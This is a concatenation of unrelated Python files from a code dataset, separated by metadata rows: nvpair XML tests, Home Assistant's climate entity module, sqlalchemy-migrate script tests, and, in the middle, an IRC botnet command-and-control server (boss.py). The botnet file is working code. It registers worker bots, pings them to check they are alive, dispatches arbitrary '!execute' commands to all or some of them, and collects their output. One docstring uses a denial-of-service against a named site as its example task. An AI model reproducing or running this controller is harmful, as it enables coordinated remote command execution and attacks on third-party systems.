nvpair.get_nvset(nvset),
)
class GetValue(TestCase):
def assert_find_value(self, tag_name, name, value, xml, default=None):
self.assertEqual(
value,
nvpair.get_value(tag_name, etree.fromstring(xml), name, default),
)
def test_return_value_when_name_exists(self):
self.assert_find_value(
"meta_attributes",
"SOME-NAME",
"some-value",
"""
<context>
<meta_attributes>
<nvpair name="SOME-NAME" value="some-value" />
<nvpair name="OTHER-NAME" value="other-value" />
</meta_attributes>
</context>
""",
)
def test_return_none_when_name_not_exists(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
<instance_attributes>
<nvpair name="another-name" value="some-value" />
</instance_attributes>
</context>
""",
)
def test_return_default_when_name_not_exists(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value="DEFAULT",
xml="""
<context>
<instance_attributes>
<nvpair name="another-name" value="some-value" />
</instance_attributes>
</context>
""",
default="DEFAULT",
)
def test_return_none_when_no_nvpair(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
<instance_attributes />
</context>
""",
)
def test_return_none_when_no_nvset(self):
self.assert_find_value(
"instance_attributes",
"SOME-NAME",
value=None,
xml="""
<context>
</context>
""",
)
class GetNvsetAsDictTest(TestCase):
def test_no_element(self):
resource_element = etree.fromstring("<primitive/>")
self.assertEqual(
dict(),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_empty(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes/>
</primitive>
"""
)
self.assertEqual(
dict(),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_non_empty(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
</primitive>
"""
)
self.assertEqual(
dict(
attr_name="value",
other_name="other-value",
),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
def test_multiple_nvsets(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
<meta_attributes>
<nvpair id="a" name="attr_name2" value="value2"/>
<nvpair id="b" name="other_name2" value="other-value2"/>
</meta_attributes>
</primitive>
"""
)
self.assertEqual(
dict(
attr_name="value",
other_name="other-value",
),
nvpair.get_nvset_as_dict("meta_attributes", resource_element),
)
class HasMetaAttribute(TestCase):
def test_return_false_if_does_not_have_such_attribute(self):
resource_element = etree.fromstring("""<primitive/>""")
self.assertFalse(
nvpair.has_meta_attribute(resource_element, "attr_name")
)
def test_return_true_if_such_meta_attribute_exists(self):
resource_element = etree.fromstring(
"""
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
<nvpair id="b" name="other_name" value="other-value"/>
</meta_attributes>
</primitive>
"""
)
self.assertTrue(
nvpair.has_meta_attribute(resource_element, "attr_name")
)
def test_return_false_if_meta_attribute_exists_but_in_nested_element(self):
resource_element = etree.fromstring(
"""
<group>
<primitive>
<meta_attributes>
<nvpair id="a" name="attr_name" value="value"/>
</meta_attributes>
</primitive>
</group>
"""
)
self.assertFalse(
nvpair.has_meta_attribute(resource_element, "attr_name")
)
| gpl-2.0 | 7,737,838,643,891,636,000 | 32.02004 | 79 | 0.468532 | false |
partofthething/home-assistant | homeassistant/components/climate/__init__.py | 16 | 16930 | """Provides functionality to interact with climate devices."""
from abc import abstractmethod
from datetime import timedelta
import functools as ft
import logging
from typing import Any, Dict, List, Optional
import voluptuous as vol
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_TENTHS,
PRECISION_WHOLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_ON,
TEMP_CELSIUS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
make_entity_service_schema,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.temperature import display_temp as show_temp
from homeassistant.helpers.typing import ConfigType, HomeAssistantType, ServiceDataType
from homeassistant.util.temperature import convert as convert_temperature
from .const import (
ATTR_AUX_HEAT,
ATTR_CURRENT_HUMIDITY,
ATTR_CURRENT_TEMPERATURE,
ATTR_FAN_MODE,
ATTR_FAN_MODES,
ATTR_HUMIDITY,
ATTR_HVAC_ACTION,
ATTR_HVAC_MODE,
ATTR_HVAC_MODES,
ATTR_MAX_HUMIDITY,
ATTR_MAX_TEMP,
ATTR_MIN_HUMIDITY,
ATTR_MIN_TEMP,
ATTR_PRESET_MODE,
ATTR_PRESET_MODES,
ATTR_SWING_MODE,
ATTR_SWING_MODES,
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
ATTR_TARGET_TEMP_STEP,
DOMAIN,
HVAC_MODE_COOL,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
HVAC_MODES,
SERVICE_SET_AUX_HEAT,
SERVICE_SET_FAN_MODE,
SERVICE_SET_HUMIDITY,
SERVICE_SET_HVAC_MODE,
SERVICE_SET_PRESET_MODE,
SERVICE_SET_SWING_MODE,
SERVICE_SET_TEMPERATURE,
SUPPORT_AUX_HEAT,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_SWING_MODE,
SUPPORT_TARGET_HUMIDITY,
SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_RANGE,
)
DEFAULT_MIN_TEMP = 7
DEFAULT_MAX_TEMP = 35
DEFAULT_MIN_HUMIDITY = 30
DEFAULT_MAX_HUMIDITY = 99
ENTITY_ID_FORMAT = DOMAIN + ".{}"
SCAN_INTERVAL = timedelta(seconds=60)
CONVERTIBLE_ATTRIBUTE = [ATTR_TEMPERATURE, ATTR_TARGET_TEMP_LOW, ATTR_TARGET_TEMP_HIGH]
_LOGGER = logging.getLogger(__name__)
SET_TEMPERATURE_SCHEMA = vol.All(
cv.has_at_least_one_key(
ATTR_TEMPERATURE, ATTR_TARGET_TEMP_HIGH, ATTR_TARGET_TEMP_LOW
),
make_entity_service_schema(
{
vol.Exclusive(ATTR_TEMPERATURE, "temperature"): vol.Coerce(float),
vol.Inclusive(ATTR_TARGET_TEMP_HIGH, "temperature"): vol.Coerce(float),
vol.Inclusive(ATTR_TARGET_TEMP_LOW, "temperature"): vol.Coerce(float),
vol.Optional(ATTR_HVAC_MODE): vol.In(HVAC_MODES),
}
),
)
async def async_setup(hass: HomeAssistantType, config: ConfigType) -> bool:
"""Set up climate entities."""
component = hass.data[DOMAIN] = EntityComponent(
_LOGGER, DOMAIN, hass, SCAN_INTERVAL
)
await component.async_setup(config)
component.async_register_entity_service(SERVICE_TURN_ON, {}, "async_turn_on")
component.async_register_entity_service(SERVICE_TURN_OFF, {}, "async_turn_off")
component.async_register_entity_service(
SERVICE_SET_HVAC_MODE,
{vol.Required(ATTR_HVAC_MODE): vol.In(HVAC_MODES)},
"async_set_hvac_mode",
)
component.async_register_entity_service(
SERVICE_SET_PRESET_MODE,
{vol.Required(ATTR_PRESET_MODE): cv.string},
"async_set_preset_mode",
[SUPPORT_PRESET_MODE],
)
component.async_register_entity_service(
SERVICE_SET_AUX_HEAT,
{vol.Required(ATTR_AUX_HEAT): cv.boolean},
async_service_aux_heat,
[SUPPORT_AUX_HEAT],
)
component.async_register_entity_service(
SERVICE_SET_TEMPERATURE,
SET_TEMPERATURE_SCHEMA,
async_service_temperature_set,
[SUPPORT_TARGET_TEMPERATURE, SUPPORT_TARGET_TEMPERATURE_RANGE],
)
component.async_register_entity_service(
SERVICE_SET_HUMIDITY,
{vol.Required(ATTR_HUMIDITY): vol.Coerce(float)},
"async_set_humidity",
[SUPPORT_TARGET_HUMIDITY],
)
component.async_register_entity_service(
SERVICE_SET_FAN_MODE,
{vol.Required(ATTR_FAN_MODE): cv.string},
"async_set_fan_mode",
[SUPPORT_FAN_MODE],
)
component.async_register_entity_service(
SERVICE_SET_SWING_MODE,
{vol.Required(ATTR_SWING_MODE): cv.string},
"async_set_swing_mode",
[SUPPORT_SWING_MODE],
)
return True
async def async_setup_entry(hass: HomeAssistantType, entry):
"""Set up a config entry."""
return await hass.data[DOMAIN].async_setup_entry(entry)
async def async_unload_entry(hass: HomeAssistantType, entry):
"""Unload a config entry."""
return await hass.data[DOMAIN].async_unload_entry(entry)
class ClimateEntity(Entity):
"""Representation of a climate entity."""
@property
def state(self) -> str:
"""Return the current state."""
return self.hvac_mode
@property
def precision(self) -> float:
"""Return the precision of the system."""
if self.hass.config.units.temperature_unit == TEMP_CELSIUS:
return PRECISION_TENTHS
return PRECISION_WHOLE
@property
def capability_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the capability attributes."""
supported_features = self.supported_features
data = {
ATTR_HVAC_MODES: self.hvac_modes,
ATTR_MIN_TEMP: show_temp(
self.hass, self.min_temp, self.temperature_unit, self.precision
),
ATTR_MAX_TEMP: show_temp(
self.hass, self.max_temp, self.temperature_unit, self.precision
),
}
if self.target_temperature_step:
data[ATTR_TARGET_TEMP_STEP] = self.target_temperature_step
if supported_features & SUPPORT_TARGET_HUMIDITY:
data[ATTR_MIN_HUMIDITY] = self.min_humidity
data[ATTR_MAX_HUMIDITY] = self.max_humidity
if supported_features & SUPPORT_FAN_MODE:
data[ATTR_FAN_MODES] = self.fan_modes
if supported_features & SUPPORT_PRESET_MODE:
data[ATTR_PRESET_MODES] = self.preset_modes
if supported_features & SUPPORT_SWING_MODE:
data[ATTR_SWING_MODES] = self.swing_modes
return data
@property
def state_attributes(self) -> Dict[str, Any]:
"""Return the optional state attributes."""
supported_features = self.supported_features
data = {
ATTR_CURRENT_TEMPERATURE: show_temp(
self.hass,
self.current_temperature,
self.temperature_unit,
self.precision,
),
}
if supported_features & SUPPORT_TARGET_TEMPERATURE:
data[ATTR_TEMPERATURE] = show_temp(
self.hass,
self.target_temperature,
self.temperature_unit,
self.precision,
)
if supported_features & SUPPORT_TARGET_TEMPERATURE_RANGE:
data[ATTR_TARGET_TEMP_HIGH] = show_temp(
self.hass,
self.target_temperature_high,
self.temperature_unit,
self.precision,
)
data[ATTR_TARGET_TEMP_LOW] = show_temp(
self.hass,
self.target_temperature_low,
self.temperature_unit,
self.precision,
)
if self.current_humidity is not None:
data[ATTR_CURRENT_HUMIDITY] = self.current_humidity
if supported_features & SUPPORT_TARGET_HUMIDITY:
data[ATTR_HUMIDITY] = self.target_humidity
if supported_features & SUPPORT_FAN_MODE:
data[ATTR_FAN_MODE] = self.fan_mode
if self.hvac_action:
data[ATTR_HVAC_ACTION] = self.hvac_action
if supported_features & SUPPORT_PRESET_MODE:
data[ATTR_PRESET_MODE] = self.preset_mode
if supported_features & SUPPORT_SWING_MODE:
data[ATTR_SWING_MODE] = self.swing_mode
if supported_features & SUPPORT_AUX_HEAT:
data[ATTR_AUX_HEAT] = STATE_ON if self.is_aux_heat else STATE_OFF
return data
@property
def temperature_unit(self) -> str:
"""Return the unit of measurement used by the platform."""
raise NotImplementedError()
@property
def current_humidity(self) -> Optional[int]:
"""Return the current humidity."""
return None
@property
def target_humidity(self) -> Optional[int]:
"""Return the humidity we try to reach."""
return None
@property
@abstractmethod
def hvac_mode(self) -> str:
"""Return hvac operation ie. heat, cool mode.
Need to be one of HVAC_MODE_*.
"""
@property
@abstractmethod
def hvac_modes(self) -> List[str]:
"""Return the list of available hvac operation modes.
Need to be a subset of HVAC_MODES.
"""
@property
def hvac_action(self) -> Optional[str]:
"""Return the current running hvac operation if supported.
Need to be one of CURRENT_HVAC_*.
"""
return None
@property
def current_temperature(self) -> Optional[float]:
"""Return the current temperature."""
return None
@property
def target_temperature(self) -> Optional[float]:
"""Return the temperature we try to reach."""
return None
@property
def target_temperature_step(self) -> Optional[float]:
"""Return the supported step of target temperature."""
return None
@property
def target_temperature_high(self) -> Optional[float]:
"""Return the highbound target temperature we try to reach.
Requires SUPPORT_TARGET_TEMPERATURE_RANGE.
"""
raise NotImplementedError
@property
def target_temperature_low(self) -> Optional[float]:
"""Return the lowbound target temperature we try to reach.
Requires SUPPORT_TARGET_TEMPERATURE_RANGE.
"""
raise NotImplementedError
@property
def preset_mode(self) -> Optional[str]:
"""Return the current preset mode, e.g., home, away, temp.
Requires SUPPORT_PRESET_MODE.
"""
raise NotImplementedError
@property
def preset_modes(self) -> Optional[List[str]]:
"""Return a list of available preset modes.
Requires SUPPORT_PRESET_MODE.
"""
raise NotImplementedError
@property
def is_aux_heat(self) -> Optional[bool]:
"""Return true if aux heater.
Requires SUPPORT_AUX_HEAT.
"""
raise NotImplementedError
@property
def fan_mode(self) -> Optional[str]:
"""Return the fan setting.
Requires SUPPORT_FAN_MODE.
"""
raise NotImplementedError
@property
def fan_modes(self) -> Optional[List[str]]:
"""Return the list of available fan modes.
Requires SUPPORT_FAN_MODE.
"""
raise NotImplementedError
@property
def swing_mode(self) -> Optional[str]:
"""Return the swing setting.
Requires SUPPORT_SWING_MODE.
"""
raise NotImplementedError
@property
def swing_modes(self) -> Optional[List[str]]:
"""Return the list of available swing modes.
Requires SUPPORT_SWING_MODE.
"""
raise NotImplementedError
def set_temperature(self, **kwargs) -> None:
"""Set new target temperature."""
raise NotImplementedError()
async def async_set_temperature(self, **kwargs) -> None:
"""Set new target temperature."""
await self.hass.async_add_executor_job(
ft.partial(self.set_temperature, **kwargs)
)
def set_humidity(self, humidity: int) -> None:
"""Set new target humidity."""
raise NotImplementedError()
async def async_set_humidity(self, humidity: int) -> None:
"""Set new target humidity."""
await self.hass.async_add_executor_job(self.set_humidity, humidity)
def set_fan_mode(self, fan_mode: str) -> None:
"""Set new target fan mode."""
raise NotImplementedError()
async def async_set_fan_mode(self, fan_mode: str) -> None:
"""Set new target fan mode."""
await self.hass.async_add_executor_job(self.set_fan_mode, fan_mode)
def set_hvac_mode(self, hvac_mode: str) -> None:
"""Set new target hvac mode."""
raise NotImplementedError()
async def async_set_hvac_mode(self, hvac_mode: str) -> None:
"""Set new target hvac mode."""
await self.hass.async_add_executor_job(self.set_hvac_mode, hvac_mode)
def set_swing_mode(self, swing_mode: str) -> None:
"""Set new target swing operation."""
raise NotImplementedError()
async def async_set_swing_mode(self, swing_mode: str) -> None:
"""Set new target swing operation."""
await self.hass.async_add_executor_job(self.set_swing_mode, swing_mode)
def set_preset_mode(self, preset_mode: str) -> None:
"""Set new preset mode."""
raise NotImplementedError()
async def async_set_preset_mode(self, preset_mode: str) -> None:
"""Set new preset mode."""
await self.hass.async_add_executor_job(self.set_preset_mode, preset_mode)
def turn_aux_heat_on(self) -> None:
"""Turn auxiliary heater on."""
raise NotImplementedError()
async def async_turn_aux_heat_on(self) -> None:
"""Turn auxiliary heater on."""
await self.hass.async_add_executor_job(self.turn_aux_heat_on)
def turn_aux_heat_off(self) -> None:
"""Turn auxiliary heater off."""
raise NotImplementedError()
async def async_turn_aux_heat_off(self) -> None:
"""Turn auxiliary heater off."""
await self.hass.async_add_executor_job(self.turn_aux_heat_off)
async def async_turn_on(self) -> None:
"""Turn the entity on."""
if hasattr(self, "turn_on"):
# pylint: disable=no-member
await self.hass.async_add_executor_job(self.turn_on)
return
# Fake turn on
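        # no native turn_on: switch to the first HVAC mode the entity
        # supports, trying heat_cool, then heat, then cool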
for mode in (HVAC_MODE_HEAT_COOL, HVAC_MODE_HEAT, HVAC_MODE_COOL):
if mode not in self.hvac_modes:
continue
await self.async_set_hvac_mode(mode)
break
async def async_turn_off(self) -> None:
"""Turn the entity off."""
if hasattr(self, "turn_off"):
# pylint: disable=no-member
await self.hass.async_add_executor_job(self.turn_off)
return
# Fake turn off
if HVAC_MODE_OFF in self.hvac_modes:
await self.async_set_hvac_mode(HVAC_MODE_OFF)
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
raise NotImplementedError()
@property
def min_temp(self) -> float:
"""Return the minimum temperature."""
return convert_temperature(
DEFAULT_MIN_TEMP, TEMP_CELSIUS, self.temperature_unit
)
@property
def max_temp(self) -> float:
"""Return the maximum temperature."""
return convert_temperature(
DEFAULT_MAX_TEMP, TEMP_CELSIUS, self.temperature_unit
)
@property
def min_humidity(self) -> int:
"""Return the minimum humidity."""
return DEFAULT_MIN_HUMIDITY
@property
def max_humidity(self) -> int:
"""Return the maximum humidity."""
return DEFAULT_MAX_HUMIDITY
async def async_service_aux_heat(
entity: ClimateEntity, service: ServiceDataType
) -> None:
"""Handle aux heat service."""
if service.data[ATTR_AUX_HEAT]:
await entity.async_turn_aux_heat_on()
else:
await entity.async_turn_aux_heat_off()
async def async_service_temperature_set(
entity: ClimateEntity, service: ServiceDataType
) -> None:
"""Handle set temperature service."""
hass = entity.hass
kwargs = {}
for value, temp in service.data.items():
if value in CONVERTIBLE_ATTRIBUTE:
kwargs[value] = convert_temperature(
temp, hass.config.units.temperature_unit, entity.temperature_unit
)
else:
kwargs[value] = temp
await entity.async_set_temperature(**kwargs)
class ClimateDevice(ClimateEntity):
"""Representation of a climate entity (for backwards compatibility)."""
def __init_subclass__(cls, **kwargs):
"""Print deprecation warning."""
super().__init_subclass__(**kwargs)
_LOGGER.warning(
"ClimateDevice is deprecated, modify %s to extend ClimateEntity",
cls.__name__,
)
| mit | -1,336,920,128,390,001,400 | 29.44964 | 87 | 0.620555 | false |
undu/irc | botnet/boss.py | 1 | 12237 | #!/usr/bin/env python
import gevent
import logging
import os
import random
import re
import sys
import time
from gevent import socket
from gevent.event import Event
from gevent.queue import Queue
from logging.handlers import RotatingFileHandler
from optparse import OptionParser
from irc import IRCConnection, IRCBot
class BotnetWorker(object):
"""\
Simple class to track available workers
"""
def __init__(self, nick, name):
self.nick = nick
self.name = name
self.awaiting_ping = Event()
class Task(object):
"""\
A single command sent to any number of workers. Serves as the storage for
any results returned by the workers.
"""
_id = 0
def __init__(self, command):
"""\
Initialize the Task with a command, where the command is a string
representing the action to be taken, i.e. `dos charlesleifer.com`
"""
self.command = command
Task._id += 1
self.id = Task._id
self.data = {}
self.workers = set()
self.finished = set()
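        # `workers` holds nicks that acknowledged the task; `finished` holds
        # nicks that reported completion. The task is done once the sets match.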
def add(self, nick):
"""\
Indicate that the worker with given nick is performing this task
"""
self.data[nick] = ''
self.workers.add(nick)
def done(self, nick):
"""\
Indicate that the worker with the given nick has finished this task
"""
self.finished.add(nick)
def is_finished(self):
return self.finished == self.workers
class BotnetBot(IRCBot):
"""\
Command and control bot for a simple Botnet
"""
def __init__(self, conn, secret, channel):
# initialize connection and register callbacks via parent class
super(BotnetBot, self).__init__(conn)
# store secret used for authentication and nick of administrator
self.secret = secret
self.boss = None
# store channels -- possibly use random channel for the command channel?
self.channel = channel
self.cmd_channel = channel + '-cmd'
# store worker bots in a dictionary keyed by nickname
self.workers = {}
# used for uptime
self.start = time.time()
# start a greenlet that periodically checks worker health
self.start_worker_health_greenlet()
# store tasks in a dictionary keyed by task id
self.tasks = {}
# get a logger instance piggy-backing off the underlying connection's
# get_logger() method - this logger will be used to store data from
# the workers
self.logger = self.get_data_logger()
# grab a reference to the connection logger for logging server state
self.conn_logger = self.conn.logger
# join the two channels
self.conn.join(self.channel)
self.conn.join(self.cmd_channel)
def get_data_logger(self):
return self.conn.get_logger('botnet.botnetbot.data.logger', 'botnet.data.log')
def send_workers(self, msg):
"""\
Convenience method to send data to the workers via command channel
"""
self.respond(msg, self.cmd_channel)
def send_user(self, msg):
"""\
Convenience method to send data to the administrator via the normal channel
"""
self.respond(msg, self.channel)
def start_worker_health_greenlet(self):
"""\
Start a greenlet that monitors workers' health
"""
gevent.spawn(self._worker_health_greenlet)
def _worker_health_greenlet(self):
while 1:
# broadcast a message to all workers
self.send_workers('!worker-ping')
# indicate that all workers are awaiting ping
for worker_nick in self.workers:
self.workers[worker_nick].awaiting_ping.set()
# wait two minutes
gevent.sleep(120)
dead = []
# find all workers who didn't respond to the ping
for worker_nick, worker in self.workers.items():
if worker.awaiting_ping.is_set():
self.conn_logger.warn('worker [%s] is dead' % worker_nick)
dead.append(worker_nick)
if dead:
self.send_user('Removed %d dead workers' % len(dead))
for nick in dead:
self.unregister(nick)
def require_boss(self, callback):
"""\
        Callback decorator that requires the calling user to be the botnet administrator
"""
def inner(nick, message, channel, *args, **kwargs):
if nick != self.boss:
return
return callback(nick, message, channel, *args, **kwargs)
return inner
def command_patterns(self):
return (
('\/join', self.join_handler),
('\/quit', self.quit_handler),
('!auth (?P<password>.+)', self.auth),
('!execute (?:(?P<num_workers>\d+)? )?(?P<command>.+)', self.require_boss(self.execute_task)),
('!print(?: (?P<task_id>\d+))?', self.require_boss(self.print_task)),
('!register (?P<hostname>.+)', self.register),
('!stop', self.require_boss(self.stop)),
('!status', self.require_boss(self.status)),
('!task-data (?P<task_id>\d+):(?P<data>.+)', self.task_data),
('!task-finished (?P<task_id>\d+)', self.task_finished),
('!task-received (?P<task_id>\d+)', self.task_received),
('!uptime', self.require_boss(self.uptime)),
('!worker-pong (?P<hostname>.+)', self.worker_health_handler),
('!help', self.require_boss(self.help)),
)
def join_handler(self, nick, message, channel):
self.logger.debug('%s joined #%s' % (nick, channel))
def quit_handler(self, nick, message, channel):
if channel == self.cmd_channel and nick in self.workers:
self.logger.info('Worker %s left, unregistering' % (nick))
self.unregister(nick)
def auth(self, nick, message, channel, password):
if not self.boss and password == self.secret:
self.boss = nick
self.logger.info('%s authenticated successfully' % nick)
return 'Success'
else:
self.logger.error('%s failed to authenticate' % nick)
def execute_task(self, nick, message, channel, command, num_workers=None):
task = Task(command)
self.tasks[task.id] = task
if num_workers is None or int(num_workers) >= len(self.workers):
# short-hand way of sending to all workers
num_workers = len(self.workers)
self.send_workers('!worker-execute %s:%s' % (task.id, task.command))
else:
num_workers = int(num_workers)
available_workers = set(self.workers.keys())
sent = 0
msg_template = '!worker-execute (%%s) %s:%s' % (task.id, task.command)
max_msg_len = 400
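            # keep each batched command comfortably under the IRC line-length
            # limit; the remaining budget (msg_diff) is spent on worker nicks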
msg_len = len(msg_template % '')
msg_diff = max_msg_len - msg_len
available = msg_diff
send_to = []
# batch up command to workers
while sent < num_workers:
worker_nick = available_workers.pop()
send_to.append(worker_nick)
sent += 1
available -= (len(worker_nick) + 1)
if available <= 0 or sent == num_workers:
self.send_workers(msg_template % (','.join(send_to)))
available = msg_diff
send_to = []
self.send_user('Scheduled task: "%s" with id %s [%d workers]' % (
task.command, task.id, num_workers
))
def execute_task_once(self, nick, message, channel, command):
task = Task(command)
self.tasks[task.id] = task
worker = self.workers[random.choice(self.workers.keys())]
self.send_user('Scheduled task: "%s" with id %s - worker: [%s:%s]' % (
task.command, task.id, worker.nick, worker.name
))
self.respond('!worker-execute %s:%s' % (task.id, task.command), nick=worker.nick)
def print_task(self, nick, message, channel, task_id=None):
if not self.tasks:
return 'No tasks to print'
task_id = int(task_id or max(self.tasks.keys()))
task = self.tasks[task_id]
def printer(task):
for nick, data in task.data.iteritems():
worker = self.workers[nick]
self.send_user('[%s:%s] - %s' % (worker.nick, worker.name, task.command))
for line in data.splitlines():
self.send_user(line.strip())
gevent.sleep(.2)
gevent.spawn(printer, task)
def uptime(self, nick, message, channel):
curr = time.time()
seconds_diff = curr - self.start
hours, remainder = divmod(seconds_diff, 3600)
minutes, seconds = divmod(remainder, 60)
return 'Uptime: %d:%02d:%02d' % (hours, minutes, seconds)
def register(self, nick, message, channel, hostname):
if nick not in self.workers:
self.workers[nick] = BotnetWorker(nick, hostname)
self.logger.info('added worker [%s]' % nick)
else:
self.logger.warn('already registered [%s]' % nick)
return '!register-success %s' % self.cmd_channel
def unregister(self, worker_nick):
        del self.workers[worker_nick]
def status(self, nick, message, channel):
self.send_user('%s workers available' % len(self.workers))
self.send_user('%s tasks have been scheduled' % len(self.tasks))
def stop(self, nick, message, channel):
self.send_workers('!worker-stop')
def task_data(self, nick, message, channel, task_id, data):
# add the data to the task's data
self.tasks[int(task_id)].data[nick] += '%s\n' % data
def task_finished(self, nick, message, channel, task_id):
task = self.tasks[int(task_id)]
task.done(nick)
self.conn_logger.info('task [%s] finished by worker %s' % (task.id, nick))
self.logger.info('%s:%s:%s' % (task.id, nick, task.data))
if task.is_finished():
self.send_user('Task %s completed by %s workers' % (task.id, len(task.data)))
def task_received(self, nick, message, channel, task_id):
task = self.tasks[int(task_id)]
task.add(nick)
self.conn_logger.info('task [%s] received by worker %s' % (task.id, nick))
def worker_health_handler(self, nick, message, channel, hostname):
if nick in self.workers:
self.workers[nick].awaiting_ping.clear()
self.logger.debug('Worker [%s] is alive' % nick)
else:
self.register(nick, message, channel, hostname)
def help(self, nick, message, channel, hostname):
self.send_user('!execute (num workers) <command> -- run "command" on workers')
self.send_user('!print (task id) -- print output of tasks or task with id')
self.send_user('!stop -- tell workers to stop their current task')
self.send_user('!status -- get status on workers and tasks')
self.send_user('!uptime -- boss uptime')
def get_parser():
parser = OptionParser(usage='%prog [options]')
parser.add_option('--server', '-s', dest='server', default='irc.freenode.net',
help='IRC server to connect to')
parser.add_option('--port', '-p', dest='port', default=6667,
help='Port to connect on', type='int')
parser.add_option('--nick', '-n', dest='nick', default='boss1337',
help='Nick to use')
parser.add_option('--secret', '-x', dest='secret', default='password')
parser.add_option('--channel', '-c', dest='channel', default='#botwars-test')
parser.add_option('--logfile', '-f', dest='logfile')
parser.add_option('--verbosity', '-v', dest='verbosity', default=1, type='int')
return parser
if __name__ == '__main__':
parser = get_parser()
(options, args) = parser.parse_args()
conn = IRCConnection(options.server, options.port, options.nick,
options.logfile, options.verbosity)
bot = BotnetBot(conn, options.secret, options.channel)
bot.run()
| mit | -2,717,471,571,980,936,000 | 33.962857 | 106 | 0.580534 | false |
andras-tim/sqlalchemy-migrate | migrate/tests/versioning/test_script.py | 63 | 10322 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import imp
import os
import sys
import shutil
import six
from migrate import exceptions
from migrate.versioning import version, repository
from migrate.versioning.script import *
from migrate.versioning.util import *
from migrate.tests import fixture
from migrate.tests.fixture.models import tmp_sql_table
class TestBaseScript(fixture.Pathed):
def test_all(self):
"""Testing all basic BaseScript operations"""
# verify / source / run
src = self.tmp()
open(src, 'w').close()
bscript = BaseScript(src)
BaseScript.verify(src)
self.assertEqual(bscript.source(), '')
self.assertRaises(NotImplementedError, bscript.run, 'foobar')
class TestPyScript(fixture.Pathed, fixture.DB):
cls = PythonScript
def test_create(self):
"""We can create a migration script"""
path = self.tmp_py()
# Creating a file that doesn't exist should succeed
self.cls.create(path)
self.assertTrue(os.path.exists(path))
# Created file should be a valid script (If not, raises an error)
self.cls.verify(path)
# Can't create it again: it already exists
self.assertRaises(exceptions.PathFoundError,self.cls.create,path)
@fixture.usedb(supported='sqlite')
def test_run(self):
script_path = self.tmp_py()
pyscript = PythonScript.create(script_path)
pyscript.run(self.engine, 1)
pyscript.run(self.engine, -1)
self.assertRaises(exceptions.ScriptError, pyscript.run, self.engine, 0)
self.assertRaises(exceptions.ScriptError, pyscript._func, 'foobar')
# clean pyc file
if six.PY3:
os.remove(imp.cache_from_source(script_path))
else:
os.remove(script_path + 'c')
# test deprecated upgrade/downgrade with no arguments
contents = open(script_path, 'r').read()
f = open(script_path, 'w')
f.write(contents.replace("upgrade(migrate_engine)", "upgrade()"))
f.close()
pyscript = PythonScript(script_path)
pyscript._module = None
try:
pyscript.run(self.engine, 1)
pyscript.run(self.engine, -1)
except exceptions.ScriptError:
pass
else:
self.fail()
def test_verify_notfound(self):
"""Correctly verify a python migration script: nonexistant file"""
path = self.tmp_py()
self.assertFalse(os.path.exists(path))
# Fails on empty path
self.assertRaises(exceptions.InvalidScriptError,self.cls.verify,path)
self.assertRaises(exceptions.InvalidScriptError,self.cls,path)
def test_verify_invalidpy(self):
"""Correctly verify a python migration script: invalid python file"""
path=self.tmp_py()
        # Create a file containing broken Python source
f = open(path,'w')
f.write("def fail")
f.close()
self.assertRaises(Exception,self.cls.verify_module,path)
# script isn't verified on creation, but on module reference
py = self.cls(path)
self.assertRaises(Exception,(lambda x: x.module),py)
def test_verify_nofuncs(self):
"""Correctly verify a python migration script: valid python file; no upgrade func"""
path = self.tmp_py()
        # Create a valid Python file without an upgrade() function
f = open(path, 'w')
f.write("def zergling():\n\tprint('rush')")
f.close()
self.assertRaises(exceptions.InvalidScriptError, self.cls.verify_module, path)
# script isn't verified on creation, but on module reference
py = self.cls(path)
self.assertRaises(exceptions.InvalidScriptError,(lambda x: x.module),py)
@fixture.usedb(supported='sqlite')
def test_preview_sql(self):
"""Preview SQL abstract from ORM layer (sqlite)"""
path = self.tmp_py()
f = open(path, 'w')
content = '''
from migrate import *
from sqlalchemy import *
metadata = MetaData()
UserGroup = Table('Link', metadata,
Column('link1ID', Integer),
Column('link2ID', Integer),
UniqueConstraint('link1ID', 'link2ID'))
def upgrade(migrate_engine):
metadata.create_all(migrate_engine)
'''
f.write(content)
f.close()
pyscript = self.cls(path)
SQL = pyscript.preview_sql(self.url, 1)
self.assertEqualIgnoreWhitespace("""
CREATE TABLE "Link"
("link1ID" INTEGER,
"link2ID" INTEGER,
UNIQUE ("link1ID", "link2ID"))
""", SQL)
# TODO: test: No SQL should be executed!
def test_verify_success(self):
"""Correctly verify a python migration script: success"""
path = self.tmp_py()
# Succeeds after creating
self.cls.create(path)
self.cls.verify(path)
# test for PythonScript.make_update_script_for_model
@fixture.usedb()
def test_make_update_script_for_model(self):
"""Construct script source from differences of two models"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
